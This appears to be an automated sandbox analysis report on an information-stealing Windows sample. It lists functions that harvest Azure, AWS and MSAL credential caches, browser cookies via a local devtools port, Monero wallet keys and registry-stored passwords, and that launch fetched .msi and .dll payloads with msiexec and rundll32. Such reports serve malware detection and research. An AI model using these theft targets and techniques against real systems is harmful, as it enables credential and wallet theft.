                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: 0bb253d77e44cbd2fa2579e5fea6dba53742aa40c73a436505df87006956797b
                                      • Instruction ID: 4ab330752cb568279a14575d9178897fa2d00201adaaa75e1cff8f6864ff6663
                                      • Opcode Fuzzy Hash: 0bb253d77e44cbd2fa2579e5fea6dba53742aa40c73a436505df87006956797b
                                      • Instruction Fuzzy Hash: A841A47A9402186BEF24E760EC57FED33389B64705F000454B985650C1EEB9ABCC8BB2
                                      Function 00D491A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D491FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: e9a5ed1b449ac230314317ec7a401fdcfd2da23d8479171500225d6817686f0c
                                      • Instruction ID: f756c40b15f1191253de37e41f06a7af6b6c4923057374f34870ba8a6bd0227e
                                      • Opcode Fuzzy Hash: e9a5ed1b449ac230314317ec7a401fdcfd2da23d8479171500225d6817686f0c
                                      • Instruction Fuzzy Hash: B371BA75A10208ABDB14EFE4D899FEEB779FB48700F108508F556A7284DB79E944CB70
                                      Function 00D43080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D43415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D435AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D4373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: cef50a392855602ede42a082ecb7aa0d010f4a821541c8920fc457f3b4ba44ef
                                      • Instruction ID: a8baae5d8134c674d25efbbd22646afb70718626fa50dc4c9ff7f546b20a38c3
                                      • Opcode Fuzzy Hash: cef50a392855602ede42a082ecb7aa0d010f4a821541c8920fc457f3b4ba44ef
                                      • Instruction Fuzzy Hash: FA1208729501189BEB19EBA4DDA2FEEB739EF14300F004199F50666192EF346B49CF72
                                      Function 00D39BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcat.KERNEL32(?,cookies), ref: 00D39CAF
                                      • lstrcat.KERNEL32(?,00D512C4), ref: 00D39CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00D39CD5
                                      • lstrcat.KERNEL32(?,00D512C8), ref: 00D39CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00D39CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00D39D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00D39D17
                                      • lstrlen.KERNEL32(00000000), ref: 00D39D26
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 1797936820-3542011879
                                      • Opcode ID: 4a2930becb42c597b1c719e199a4f5091ef1511faeb5e84dc13b114776e6f927
                                      • Instruction ID: 1d1046c98500f0a9f4008776b16684625d739cba3791634677a9244b65cdd0a0
                                      • Opcode Fuzzy Hash: 4a2930becb42c597b1c719e199a4f5091ef1511faeb5e84dc13b114776e6f927
                                      • Instruction Fuzzy Hash: 3F517C76910618ABDB14EBE4DC96FEE7338AF04301F404558F60AA7084EF75AA48CF71
                                      Function 00D45510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D362D0: InternetOpenA.WININET(00D50DFF,00000001,00000000,00000000,00000000), ref: 00D36331
                                        • Part of subcall function 00D362D0: StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D36353
                                        • Part of subcall function 00D362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36385
                                        • Part of subcall function 00D362D0: HttpOpenRequestA.WININET(00000000,GET,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D363D5
                                        • Part of subcall function 00D362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D3640F
                                        • Part of subcall function 00D362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D36421
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45568
                                      • lstrlen.KERNEL32(00000000), ref: 00D4557F
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00D455B4
                                      • lstrlen.KERNEL32(00000000), ref: 00D455D3
                                      • lstrlen.KERNEL32(00000000), ref: 00D455FE
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: 53cf86e2b2d3d33aa5e13c4846b6377ecb266b90f89d1674163aceab062c699f
                                      • Instruction ID: c891a1a9fa95adff428ac922acec4e8e63528c52f6b5af34c47abf2f20528613
                                      • Opcode Fuzzy Hash: 53cf86e2b2d3d33aa5e13c4846b6377ecb266b90f89d1674163aceab062c699f
                                      • Instruction Fuzzy Hash: 45510C309505089BDB14FF68D9A6AED7739EF10381F504468F84A57592EF34AB09CB72
                                      Function 00D41520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 634b794779fafb0f987ace2d9d6bdf042a0a5ddb844d68fbd0491ca0ac88e5f2
                                      • Instruction ID: 5958119ef461a03afd05d00c3a837f9e91ed3836ef40e02084d7598cd65f182a
                                      • Opcode Fuzzy Hash: 634b794779fafb0f987ace2d9d6bdf042a0a5ddb844d68fbd0491ca0ac88e5f2
                                      • Instruction Fuzzy Hash: 6BC1B1B5940219ABCB24EF60DC9AFEE7379EF54304F004598E509A7241EB75EA84CFB1
                                      Function 00D444D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D4453C
                                      • lstrcat.KERNEL32(?,0167E0E0), ref: 00D4455B
                                      • lstrcat.KERNEL32(?,?), ref: 00D4456F
                                      • lstrcat.KERNEL32(?,0167CF60), ref: 00D44583
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D48F20: GetFileAttributesA.KERNEL32(00000000,?,00D31B94,?,?,00D5577C,?,?,00D50E22), ref: 00D48F2F
                                        • Part of subcall function 00D3A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D3A489
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                        • Part of subcall function 00D49550: GlobalAlloc.KERNEL32(00000000,00D4462D,00D4462D), ref: 00D49563
                                      • StrStrA.SHLWAPI(?,0167DF18), ref: 00D44643
                                      • GlobalFree.KERNEL32(?), ref: 00D44762
                                        • Part of subcall function 00D3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A23F
                                        • Part of subcall function 00D3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00D34F3E,00000000,?), ref: 00D3A251
                                        • Part of subcall function 00D3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A27A
                                        • Part of subcall function 00D3A210: LocalFree.KERNEL32(?,?,?,?,00D34F3E,00000000,?), ref: 00D3A28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D446F3
                                      • StrCmpCA.SHLWAPI(?,00D508D2), ref: 00D44710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00D44722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00D44735
                                      • lstrcat.KERNEL32(00000000,00D50FA0), ref: 00D44744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 2f97b52d92eb7c919205ecb7748ddf0ddc593ae8abf4242758903face50e572e
                                      • Instruction ID: add378f7a5ed0d1b2eaca9a1f077ac41c1a15bf4b96463d5b765f8377b20977d
                                      • Opcode Fuzzy Hash: 2f97b52d92eb7c919205ecb7748ddf0ddc593ae8abf4242758903face50e572e
                                      • Instruction Fuzzy Hash: B27196B6900208ABDB14EBA4DC99FEE7379EB88300F004598F54596181EB35EB48CBB1
                                      Function 00D31310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                                        • Part of subcall function 00D312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                                        • Part of subcall function 00D312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                                        • Part of subcall function 00D312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                                        • Part of subcall function 00D312A0: RegCloseKey.ADVAPI32(?), ref: 00D312FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3134F
                                      • lstrlen.KERNEL32(?), ref: 00D3135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00D31377
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00D31465
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D314EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: 69c0be24cfce2e50893c31a415f0f84df1b0f87c625aa471eb5d294ef30cf8c0
                                      • Instruction ID: 9ff7c72d5c02cd05916c37abb4507dbd235ee0e47297053bbd786ac466e0caf9
                                      • Opcode Fuzzy Hash: 69c0be24cfce2e50893c31a415f0f84df1b0f87c625aa471eb5d294ef30cf8c0
                                      • Instruction Fuzzy Hash: 6C5140B1D501199BDB25EB64DDA2FED733CDF54300F4045D8B60A62082EE746B88CBB6
                                      Function 00D37630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D37330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3739A
                                        • Part of subcall function 00D37330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D37411
                                        • Part of subcall function 00D37330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3746D
                                        • Part of subcall function 00D37330: GetProcessHeap.KERNEL32(00000000,?), ref: 00D374B2
                                        • Part of subcall function 00D37330: HeapFree.KERNEL32(00000000), ref: 00D374B9
